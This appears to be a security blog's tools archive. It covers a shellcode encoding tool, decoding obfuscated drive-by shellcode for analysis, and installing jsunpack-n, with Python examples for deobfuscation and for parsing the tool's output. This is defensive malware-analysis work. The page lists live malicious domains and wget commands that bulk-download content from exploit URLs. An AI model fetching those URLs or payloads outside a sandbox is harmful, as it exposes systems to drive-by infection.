Archive for the ‘Tools’ Category

BETA3 multi-format shellcode encoding tool

BETA3 can convert raw binary shellcode into text that can be embedded in exploit source code, and it supports a large number of encodings. It can also do the reverse: decode data in any of those encodings back into binary. The official page where you can download it can be found here.

Converting Shellcode into an Executable For Further Analysis

Exploit toolkits in the wild often use download-and-execute shellcode, which, when run on the end system, downloads and executes a file that lets the attacker control the system. This is commonly used in drive-by download attacks, where a victim visits a malicious web page that in turn attempts to execute the shellcode in order to install software on the victim’s machine.

More often than not the shellcode is buried within obfuscated JavaScript. Searching the Murls database reveals one such URL (hxxp://rrrxgvdf.6600.org/kuaile/19.htm).

The above image visualizes the series of redirects that occur via iframe tags after the victim browses to hxxp://rrrxgvdf.6600.org/kuaile/19.htm. The example below was found at the following URL (wm.yxnjs.com_x148_of.js). It shows a simple form of obfuscation in which the attacker replaces “%u” with “MTV”.

Example of Obfuscated Shellcode

Exploits that target browsers commonly encode shellcode in a JavaScript string using percent-encoding, “%uXXXX”-encoding or entity encoding. Some exploits also obfuscate the encoded shellcode string further to evade detection by IDS. The example above is one such obfuscation: the characters “MTV” stand in for “%u”, and the underlying encoding in this case is percent-encoding.

Thanks to David Zimmer over at iDefense, the following tool can be used to investigate shellcode by either static or dynamic analysis. Before we can do that we have to clean up the code by replacing MTV with %u and stripping everything else, so that we are left with a pure “%uXXXX” string. Once the code is cleaned up you can submit it here. The script will then return a file named shecode.exe_ (the underscore is so that you don’t execute it by accident). After saving it to the desktop you can submit it to VirusTotal, open it in your debugger/disassembler, or submit it to Anubis for a behavioral analysis.
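The cleanup and decoding steps described above, written out as an added Python example (not the iDefense script or any code from the original post). The sample string, the MTV token and the file name shecode.exe_ follow the post; the output directory and the surrounding JavaScript noise in the sample are constructed for illustration.

```python
import re
import struct

# Constructed sample, not taken from the original post: a "%uXXXX" string
# whose "%u" has been replaced with the token "MTV", wrapped in the kind of
# JavaScript noise a quick copy-paste from the exploit page would carry along.
SAMPLE = 'var sc = unescape("MTV9090MTV9090MTVcc90"); // decoded by unescape()'

UNIT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def deobfuscate(text, token="MTV", marker="%u"):
    """Undo the token substitution: put "%u" back where the obfuscator wrote MTV."""
    return text.replace(token, marker)

def extract_units(text):
    """Keep only well-formed %uXXXX / %XX units and drop everything else."""
    return "".join(m.group(0) for m in UNIT_RE.finditer(text))

def decode_units(encoded):
    """Turn the cleaned string into the bytes JavaScript unescape() would
    materialise in memory: each %uXXXX is one UTF-16 code unit stored
    little-endian (2 bytes), each %XX a single byte."""
    out = bytearray()
    for m in UNIT_RE.finditer(encoded):
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)

def shellcode_from_obfuscated(text, token="MTV"):
    """Full pipeline: token -> %u, strip noise, decode to bytes. Also returns
    the number of units decoded so the analyst can check the cleanup consumed
    the whole string rather than silently dropping a malformed tail."""
    cleaned = extract_units(deobfuscate(text, token))
    return decode_units(cleaned), len(UNIT_RE.findall(cleaned))

def write_for_analysis(raw, path="shecode.exe_"):
    """Save with a trailing underscore, as the post's script does, so the file
    cannot be executed by an accidental double-click."""
    with open(path, "wb") as fh:
        fh.write(raw)
    return path

if __name__ == "__main__":
    raw, n = shellcode_from_obfuscated(SAMPLE)
    print(f"{n} units -> {raw.hex()}")   # 3 units -> 9090909090cc
```

The decoded bytes can then be handed to VirusTotal, a disassembler or a sandbox exactly as the post describes.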

Virus Total Report
Threatexpert Report

Installing Jsunpack-n v0.1e On Ubuntu 9.04

A new version of Jsunpack-n was posted recently and I have finally got around to installing it. There are some very cool new features, such as:

1) improved URL tracking using ‘urlattr’ class and urls dictionary
1a) new command line option -g, to create a URL graph (only when pcap contains 10 or fewer URL requests)

2) bug fixes for stream reassembly and pdf parsing
2a) stream reassembly now handles all streams when processing a pcap file, regardless of whether the nids state is in end_states
4) detection of NOP sled shellcode and performance improvements in shellcode processing (this was one of the performance bottlenecks)
5) new output format with ./files/ directory or -d OUTDIR command line option
6) CVE references are available in the ‘rules’ file but are temporarily unavailable in alerts

One of the major differences is that this release depends on Yara. Before you attempt to install Yara, make sure you install PCRE by running the following command:

$ sudo apt-get install libpcre3 libpcre3-dev

Now download the following files:

1) http://yara-project.googlecode.com/files/yara-1.2.1.tar.gz
2) http://yara-project.googlecode.com/files/yara-python-1.2.1.tar.gz

For yara-python-1.2.1.tar.gz you can build by running the following commands:

$ tar xzvf yara-python-1.2.1.tar.gz
$ cd yara-python-1.2.1
$ python setup.py build
$ sudo python setup.py install

And then for yara-1.2.1.tar.gz simply run:

$ tar xzvf yara-1.2.1.tar.gz
$ cd yara-1.2.1
$ ./configure && make && sudo make install

Next, make the dynamic linker aware of the newly installed library by running the following commands (note that with a plain `sudo echo ... >> file` the redirection would run as your own user, not as root, so `tee` is used instead):

$ echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
$ sudo ldconfig

I then ran jsunpack-n against one of the sample .pcap files with the new -g option to generate an image file; however, I immediately received the following error:

$ sudo ./jsunpack-n.py sample-http-exploit.pcap -g url
Traceback (most recent call last):
  File "./jsunpack-n.py", line 1030, in <module>
    main()
  File "./jsunpack-n.py", line 1026, in main
    graph(file, js.urls, options.graphfile)
  File "./jsunpack-n.py", line 924, in graph
    import yapgvb
ImportError: No module named yapgvb

The error is caused by a missing Python module, which can easily be installed by running the following command:

$ sudo apt-get install python-yapgvb

Now that everything is working, I scraped MalwareURL.com for the most recent IPs/domains associated with exploits using the following command:

$ links2 -dump 'http://www.malwareurl.com/search.php?domain=&s=exploits&match=0&rp=100&urls=on&redirs=on&ip=on&reverse=on&as=on' | awk '{print $1}' | sed 's/|//' | egrep "[A-Za-z0-9/]" | awk '{print "http://"$1}' >> t3stURLS.txt

The command stores a list of URLs in a file called t3stURLS.txt. With jsunpack-n running in the background, we can then use wget to loop through t3stURLS.txt and download the content to see what gets picked up and decoded:

$ wget -i t3stURLS.txt -T 1 -t 3

Below is a small sample of the jsunpack-n output that was generated.

*Caution: malicious URLs*

[suspicious:5] 55x5h.2288.org/fkzd/2.htm
[impact=5] DecodedIframe  detected <iframe
[info] [iframe http] http://wm.7udij.cn/x87/xx.html
[info] [script http] http://js.tongji.linezing.com/1240663/tongji.js
[suspicious:5] wm.7udij.cn/x87/xx.html
[impact=5] DecodedIframe  detected <iframe
[info] [iframe .] wm.7udij.cn/x87/Td14.htm
[info] [iframe .] wm.7udij.cn/x87/yt.htm
[info] [iframe .] wm.7udij.cn/x87/td09.htm
[info] [iframe .] wm.7udij.cn/x87/yut.htm
[suspicious:5] 44x5h.2288.org/fkzd/2.htm
[impact=5] DecodedIframe  detected <iframe
[info] [iframe http] http://wm.7udij.cn/x87/xx.html
[info] [script http] http://js.tongji.linezing.com/1240663/tongji.js
[suspicious:5] wm.6bief.cn/x3/xx.html
[impact=5] DecodedIframe  detected <iframe
[info] [iframe .] wm.6bief.cn/x3/Td14.htm
[info] [iframe .] wm.6bief.cn/x3/yt.htm
[info] [iframe .] wm.6bief.cn/x3/td09.htm
[info] [iframe .] wm.6bief.cn/x3/yut.htm

As you can see from the output above, jsunpack-n was able to decode the obfuscated JavaScript and output the iframes that were buried within. Because I am using wget, the iframes are not followed, so this test only touches on some of the functionality jsunpack-n provides. Originally, I believe, jsunpack-n was developed to act as an IDS application; however, it can also be used for research purposes.
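To turn output like the above into something a defender can act on (which landing page led to which iframe, and which hosts to look for in proxy logs), here is an added Python parser for the jsunpack-n line format shown in this post. It is not part of jsunpack-n; the sample lines are constructed in that format with placeholder hosts rather than the URLs from the post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in jsunpack-n's output format; hosts are placeholders,
# not the URLs from the original post.
SAMPLE = """\
[suspicious:5] landing.example.invalid/fkzd/2.htm
[impact=5] DecodedIframe  detected <iframe
[info] [iframe http] http://wm.example.invalid/x87/xx.html
[info] [script http] http://stats.example.invalid/1240663/tongji.js
[suspicious:5] wm.example.invalid/x87/xx.html
[impact=5] DecodedIframe  detected <iframe
[info] [iframe .] wm.example.invalid/x87/Td14.htm
[info] [iframe .] wm.example.invalid/x87/yt.htm
"""
LINE_RE = re.compile(r"^\[(suspicious|impact|info)(?:[:=](\d+))?\]\s*(.*)$")
REF_RE = re.compile(r"^\[(iframe|script) (\S+)\]\s+(\S+)$")

def parse_jsunpack(text):
    """Group each decoded iframe/script reference under the suspicious URL
    whose JavaScript produced it: {url: {"score", "impacts", "refs"}}."""
    report, current = {}, None
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        kind, score, rest = m.groups()
        if kind == "suspicious":            # header line opens a new group
            current = rest
            report[current] = {"score": int(score), "impacts": [], "refs": []}
        elif current is None:
            continue                        # info/impact before any header
        elif kind == "impact":
            report[current]["impacts"].append((int(score), rest))
        else:
            ref = REF_RE.match(rest)        # "[iframe http] url" / "[iframe .] url"
            if ref:
                report[current]["refs"].append((ref.group(1), ref.group(3)))
    return report

def redirect_edges(report):
    """(parent page, child URL) pairs: the iframe chain jsunpack-n decoded."""
    return [(src, url) for src, d in report.items() for _, url in d["refs"]]

def hosts_to_review(report):
    """Distinct hosts reached via decoded iframes/scripts, for proxy-log review."""
    return sorted({urlsplit(u if "://" in u else "//" + u).hostname
                   for _, u in redirect_edges(report)})
```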

The new files directory now organizes the decodings by MD5 and also saves the executables.

This tool has come a long way and has become one of my favorites. Many thanks to the author for sharing it with everyone in the community.
